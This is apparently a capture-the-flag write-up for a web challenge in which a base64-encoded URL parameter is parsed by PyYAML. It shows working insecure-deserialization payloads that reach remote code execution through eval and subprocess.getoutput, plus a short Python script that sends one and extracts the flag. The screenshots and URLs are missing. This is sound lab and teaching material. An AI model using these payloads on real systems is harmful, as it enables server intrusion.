Tags: web yaml 

Rating: 5.0

### Challenge Description


### Initial Analysis

The site appears as follows:


The first thing that immediately stands out is the site's URL:


In fact, that looks like a base64 encoding. Let's try to decode it:

echo "eWFtbDogSXRzIHlhbWwgYnJvLCBoYWNrIG1lIGlmIHlvdSBjYW4hISE=" | base64 -d

Decoding it, I got the following:

yaml: Its yaml bro, hack me if you can!!!

So, the decoded base64 seems to be reflected on the page, as we can see from the previous screenshot. It seems that since it mentions YAML, this could be a case of YAML insecure deserialization. In fact, looking at the request header, we can tell that everything is being executed with Python. Since Python has a library called PyYAML, we can exploit the deserialization process to achieve Remote Code Execution (RCE).

### Exploit
I personally used this payload:

yaml: !!python/object/apply:eval ["__import__('os').listdir('.')"]

But many other payloads could have been used, such as:

yaml: !!python/object/apply:subprocess.getoutput ["ls -al"]
Other payloads can be found on [PayloadsAllTheThings](). So, I simply encoded it in base64:

echo "yaml: python/object/apply:subprocess.getoutput ['ls -al']" | base64

And that's how I formed the URL for injecting the "ls -al" command:


By opening the URL, the command was executed on the server, listing the directories, and in doing so, I found the flag:


### Automated Exploit

I also created an automated Python exploit for extracting the flag:

import requests
import base64
import re

url = ""
payload = '''yaml: !!python/object/apply:eval ["__import__('os').listdir('.')"]'''
print("\nFLAG: " + re.search(r'KCTF{[a-f0-9]+}', requests.get(url + base64.b64encode(payload.encode('utf-8')).decode('utf-8')).text).group(0))

### Flag
